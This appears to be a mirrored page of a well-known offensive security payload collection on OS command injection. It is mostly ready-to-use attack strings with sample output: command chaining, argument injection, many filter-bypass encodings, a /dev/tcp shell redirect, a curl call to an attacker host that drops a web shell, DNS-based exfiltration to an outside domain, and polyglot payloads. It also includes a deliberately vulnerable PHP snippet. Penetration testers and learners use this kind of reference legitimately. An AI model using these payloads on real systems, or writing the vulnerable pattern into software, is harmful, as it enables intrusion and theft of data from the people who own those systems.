index.md (16979B)
1 --- 2 title: "Command Injection" 3 topic: "Command Injection" 4 topicSlug: "command-injection" 5 sourcePath: "Command Injection/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Command%20Injection/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Command Injection 12 13 > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Methodology](#methodology) 19 * [Basic Commands](#basic-commands) 20 * [Chaining Commands](#chaining-commands) 21 * [Argument Injection](#argument-injection) 22 * [Inside A Command](#inside-a-command) 23 * [Filter Bypasses](#filter-bypasses) 24 * [Bypass Without Space](#bypass-without-space) 25 * [Bypass With A Line Return](#bypass-with-a-line-return) 26 * [Bypass With Backslash Newline](#bypass-with-backslash-newline) 27 * [Bypass With Tilde Expansion](#bypass-with-tilde-expansion) 28 * [Bypass With Brace Expansion](#bypass-with-brace-expansion) 29 * [Bypass Characters Filter](#bypass-characters-filter) 30 * [Bypass Characters Filter Via Hex Encoding](#bypass-characters-filter-via-hex-encoding) 31 * [Bypass With Single Quote](#bypass-with-single-quote) 32 * [Bypass With Double Quote](#bypass-with-double-quote) 33 * [Bypass With Backticks](#bypass-with-backticks) 34 * [Bypass With Backslash And Slash](#bypass-with-backslash-and-slash) 35 * [Bypass With $@](#bypass-with-) 36 * [Bypass With $()](#bypass-with--1) 37 * [Bypass With Variable Expansion](#bypass-with-variable-expansion) 38 * [Bypass With Wildcards](#bypass-with-wildcards) 39 * [Bypass With Random Case](#bypass-with-random-case) 40 * [Data Exfiltration](#data-exfiltration) 41 * [Time Based Data Exfiltration](#time-based-data-exfiltration) 42 * [Dns Based Data Exfiltration](#dns-based-data-exfiltration) 43 * [Polyglot Command Injection](#polyglot-command-injection) 44 * [Tricks](#tricks) 45 * [Backgrounding Long Running Commands](#backgrounding-long-running-commands) 46 * [Remove Arguments After The Injection](#remove-arguments-after-the-injection) 47 * [Labs](#labs) 48 * [Challenge](#challenge) 49 * [References](#references) 50 51 ## Tools 52 53 * [commixproject/commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool 54 * [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library 55 56 ## Methodology 57 58 Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system. 59 60 The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise. 61 62 **Example of Command Injection with PHP**: 63 Suppose you have a PHP script that takes a user input to ping a specified IP address or domain: 64 65 ```php 66 <?php 67 $ip = $_GET['ip']; 68 system("ping -c 4 " . $ip); 69 ?> 70 ``` 71 72 In the above code, the PHP script uses the `system()` function to execute the `ping` command with the IP address or domain provided by the user through the `ip` GET parameter. 73 74 If an attacker provides input like `8.8.8.8; cat /etc/passwd`, the actual command that gets executed would be: `ping -c 4 8.8.8.8; cat /etc/passwd`. 75 76 This means the system would first `ping 8.8.8.8` and then execute the `cat /etc/passwd` command, which would display the contents of the `/etc/passwd` file, potentially revealing sensitive information. 77 78 ### Basic Commands 79 80 Execute the command and voila :p 81 82 ```powershell 83 cat /etc/passwd 84 root:x:0:0:root:/root:/bin/bash 85 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 86 bin:x:2:2:bin:/bin:/bin/sh 87 sys:x:3:3:sys:/dev:/bin/sh 88 ... 89 ``` 90 91 ### Chaining Commands 92 93 In many command-line interfaces, especially Unix-like systems, there are several characters that can be used to chain or manipulate commands. 94 95 * `;` (Semicolon): Allows you to execute multiple commands sequentially. 96 * `&&` (AND): Execute the second command only if the first command succeeds (returns a zero exit status). 97 * `||` (OR): Execute the second command only if the first command fails (returns a non-zero exit status). 98 * `&` (Background): Execute the command in the background, allowing the user to continue using the shell. 99 * `|` (Pipe): Takes the output of the first command and uses it as the input for the second command. 100 101 ```powershell 102 command1; command2 # Execute command1 and then command2 103 command1 && command2 # Execute command2 only if command1 succeeds 104 command1 || command2 # Execute command2 only if command1 fails 105 command1 & command2 # Execute command1 in the background 106 command1 | command2 # Pipe the output of command1 into command2 107 ``` 108 109 ### Argument Injection 110 111 Gain a command execution when you can only append arguments to an existing command. 112 Use this website [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/) to find the argument to inject to gain command execution. 113 114 * Chrome 115 116 ```ps1 117 chrome '--gpu-launcher="id>/tmp/foo"' 118 ``` 119 120 * SSH 121 122 ```ps1 123 ssh '-oProxyCommand="touch /tmp/foo"' foo@foo 124 ``` 125 126 * psql 127 128 ```ps1 129 psql -o'|id>/tmp/foo' 130 ``` 131 132 Argument injection can be abused using the [worstfit](https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/) technique. 133 134 In the following example, the payload `" --use-askpass=calc "` is using **fullwidth double quotes** (U+FF02) instead of the **regular double quotes** (U+0022) 135 136 ```php 137 $url = "https://example.tld/" . $_GET['path'] . ".txt"; 138 system("wget.exe -q " . escapeshellarg($url)); 139 ``` 140 141 Sometimes, direct command execution from the injection might not be possible, but you may be able to redirect the flow into a specific file, enabling you to deploy a web shell. 142 143 * curl 144 145 ```ps1 146 # -o, --output <file> Write to file instead of stdout 147 curl http://[ATTACKER.DOMAIN.TLD]/ -o webshell.php 148 ``` 149 150 ### Inside A Command 151 152 * Command injection using backticks. 153 154 ```bash 155 original_cmd_by_server `cat /etc/passwd` 156 ``` 157 158 * Command injection using substitution 159 160 ```bash 161 original_cmd_by_server $(cat /etc/passwd) 162 ``` 163 164 ## Filter Bypasses 165 166 ### Bypass Without Space 167 168 * `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a separator in commands like `ls`, `wget`; use `${IFS}` instead. 169 170 ```powershell 171 cat${IFS}/etc/passwd 172 ls${IFS}-la 173 ``` 174 175 * In some shells, brace expansion generates arbitrary strings. When executed, the shell will treat the items inside the braces as separate commands or arguments. 176 177 ```powershell 178 {cat,/etc/passwd} 179 ``` 180 181 * Input redirection. The < character tells the shell to read the contents of the file specified. 182 183 ```powershell 184 cat</etc/passwd 185 sh</dev/tcp/127.0.0.1/4242 186 ``` 187 188 * ANSI-C Quoting 189 190 ```powershell 191 X=$'uname\x20-a'&&$X 192 ``` 193 194 * The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value `09`. 195 196 ```powershell 197 ;ls%09-al%09/home 198 ``` 199 200 * In Windows, `%VARIABLE:~start,length%` is a syntax used for substring operations on environment variables. 201 202 ```powershell 203 ping%CommonProgramFiles:~10,-18%127.0.0.1 204 ping%PROGRAMFILES:~10,-5%127.0.0.1 205 ``` 206 207 ### Bypass With A Line Return 208 209 Commands can also be run in sequence with newlines 210 211 ```bash 212 original_cmd_by_server 213 ls 214 ``` 215 216 ### Bypass With Backslash Newline 217 218 * Commands can be broken into parts by using backslash followed by a newline 219 220 ```powershell 221 $ cat /et\ 222 c/pa\ 223 sswd 224 ``` 225 226 * URL encoded form would look like this: 227 228 ```powershell 229 cat%20/et%5C%0Ac/pa%5C%0Asswd 230 ``` 231 232 ### Bypass With Tilde Expansion 233 234 ```powershell 235 echo ~+ 236 echo ~- 237 ``` 238 239 ### Bypass With Brace Expansion 240 241 ```powershell 242 {,ip,a} 243 {,ifconfig} 244 {,ifconfig,eth0} 245 {l,-lh}s 246 {,echo,#test} 247 {,$"whoami",} 248 {,/?s?/?i?/c?t,/e??/p??s??,} 249 ``` 250 251 ### Bypass Characters Filter 252 253 Commands execution without backslash and slash - linux bash 254 255 ```powershell 256 swissky@crashlab:~$ echo ${HOME:0:1} 257 / 258 259 swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd 260 root:x:0:0:root:/root:/bin/bash 261 262 swissky@crashlab:~$ echo . | tr '!-0' '"-1' 263 / 264 265 swissky@crashlab:~$ tr '!-0' '"-1' <<< . 266 / 267 268 swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd 269 root:x:0:0:root:/root:/bin/bash 270 ``` 271 272 ### Bypass Characters Filter Via Hex Encoding 273 274 ```powershell 275 swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" 276 /etc/passwd 277 278 swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"` 279 root:x:0:0:root:/root:/bin/bash 280 281 swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc 282 root:x:0:0:root:/root:/bin/bash 283 284 swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'` 285 root:x:0:0:root:/root:/bin/bash 286 287 swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764 288 /etc/passwd 289 290 swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764` 291 root:x:0:0:root:/root:/bin/bash 292 293 swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764) 294 /etc/passwd 295 296 swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)` 297 root:x:0:0:root:/root:/bin/bash 298 ``` 299 300 ### Bypass With Single Quote 301 302 ```powershell 303 w'h'o'am'i 304 wh''oami 305 'w'hoami 306 ``` 307 308 ### Bypass With Double Quote 309 310 ```powershell 311 w"h"o"am"i 312 wh""oami 313 "wh"oami 314 ``` 315 316 ### Bypass With Backticks 317 318 ```powershell 319 wh``oami 320 ``` 321 322 ### Bypass With Backslash and Slash 323 324 ```powershell 325 w\ho\am\i 326 /\b\i\n/////s\h 327 ``` 328 329 ### Bypass With $@ 330 331 `$0`: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, `$0` will typically give the name of the shell. 332 333 ```powershell 334 who$@ami 335 echo whoami|$0 336 ``` 337 338 ### Bypass With $() 339 340 ```powershell 341 who$()ami 342 who$(echo am)i 343 who`echo am`i 344 ``` 345 346 ### Bypass With Variable Expansion 347 348 ```powershell 349 /???/??t /???/p??s?? 350 351 test=/ehhh/hmtc/pahhh/hmsswd 352 cat ${test//hhh\/hm/} 353 cat ${test//hh??hm/} 354 ``` 355 356 ### Bypass With Wildcards 357 358 ```powershell 359 powershell C:\*\*2\n??e*d.*? # notepad 360 @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc 361 ``` 362 363 ### Bypass With Random Case 364 365 Windows does not distinguish between uppercase and lowercase letters when interpreting commands or file paths. For example, `DIR`, `dir`, or `DiR` will all execute the same `dir` command. 366 367 ```powershell 368 wHoAmi 369 ``` 370 371 ## Data Exfiltration 372 373 ### Time Based Data Exfiltration 374 375 Extracting data char by char and detect the correct value based on the delay. 376 377 * Correct value: wait 5 seconds 378 379 ```powershell 380 swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi 381 real 0m5.007s 382 user 0m0.000s 383 sys 0m0.000s 384 ``` 385 386 * Incorrect value: no delay 387 388 ```powershell 389 swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi 390 real 0m0.002s 391 user 0m0.000s 392 sys 0m0.000s 393 ``` 394 395 ### Dns Based Data Exfiltration 396 397 Based on the tool from [HoLyVieR/dnsbin](https://github.com/HoLyVieR/dnsbin), also hosted at [dnsbin.zhack.ca](http://dnsbin.zhack.ca/) 398 399 1. Go to [dnsbin.zhack.ca](http://dnsbin.zhack.ca) 400 2. Execute a simple 'ls' 401 402 ```powershell 403 for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done 404 ``` 405 406 Online tools to check for DNS based data exfiltration: 407 408 * [dnsbin.zhack.ca](http://dnsbin.zhack.ca) 409 * [app.interactsh.com](https://app.interactsh.com) 410 * [portswigger.net](https://portswigger.net/burp/documentation/collaborator) 411 412 ## Polyglot Command Injection 413 414 A polyglot is a piece of code that is valid and executable in multiple programming languages or environments simultaneously. When we talk about "polyglot command injection," we're referring to an injection payload that can be executed in multiple contexts or environments. 415 416 * Example 1: 417 418 ```powershell 419 Payload: 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} 420 421 # Context inside commands with single and double quote: 422 echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} 423 echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} 424 echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} 425 ``` 426 427 * Example 2: 428 429 ```powershell 430 Payload: /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ 431 432 # Context inside commands with single and double quote: 433 echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ 434 echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/" 435 echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/' 436 ``` 437 438 ## Tricks 439 440 ### Backgrounding Long Running Commands 441 442 In some instances, you might have a long running command that gets killed by the process injecting it timing out. 443 Using `nohup`, you can keep the process running after the parent process exits. 444 445 ```bash 446 nohup sleep 120 > /dev/null & 447 ``` 448 449 ### Remove Arguments After The Injection 450 451 In Unix-like command-line interfaces, the `--` symbol is used to signify the end of command options. After `--`, all arguments are treated as filenames and arguments, and not as options. 452 453 ## Labs 454 455 * [PortSwigger - OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) 456 * [PortSwigger - Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) 457 * [PortSwigger - Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) 458 * [PortSwigger - Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) 459 * [PortSwigger - Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) 460 * [Root Me - PHP - Command injection](https://www.root-me.org/en/Challenges/Web-Server/PHP-Command-injection) 461 * [Root Me - Command injection - Filter bypass](https://www.root-me.org/en/Challenges/Web-Server/Command-injection-Filter-bypass) 462 * [Root Me - PHP - assert()](https://www.root-me.org/en/Challenges/Web-Server/PHP-assert) 463 * [Root Me - PHP - preg_replace()](https://www.root-me.org/en/Challenges/Web-Server/PHP-preg_replace) 464 465 ### Challenge 466 467 Challenge based on the previous tricks, what does the following command do: 468 469 ```powershell 470 g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/} 471 ``` 472 473 **NOTE**: The command is safe to run, but you should not trust me. 474 475 ## References 476 477 * [Argument Injection and Getting Past Shellwords.escape - Etienne Stalmans - November 24, 2019](https://web.archive.org/web/20250306133700/https://staaldraad.github.io/post/2019-11-24-argument-injection/) 478 * [Argument Injection Vectors - SonarSource - February 21, 2023](https://web.archive.org/web/20251211212046/https://sonarsource.github.io/argument-injection-vectors/) 479 * [Back to the Future: Unix Wildcards Gone Wild - Leon Juranic - June 25, 2014](https://web.archive.org/web/20140714140437/http://www.exploit-db.com/papers/33930) 480 * [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://web.archive.org/web/20241202133053/https://twitter.com/DissectMalware/status/1025604382644232192) 481 * [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136) 482 * [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://web.archive.org/web/20220428000241/https://twitter.com/asdizzle_/status/895244943526170628) 483 * [OS Command Injection - PortSwigger - March 30, 2019](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection) 484 * [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://web.archive.org/web/20250108174818/https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) 485 * [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - Kacper Szurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) 486 * [WorstFit: Unveiling Hidden Transformers in Windows ANSI! - Orange Tsai - January 10, 2025](https://web.archive.org/web/20250109163006/https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/)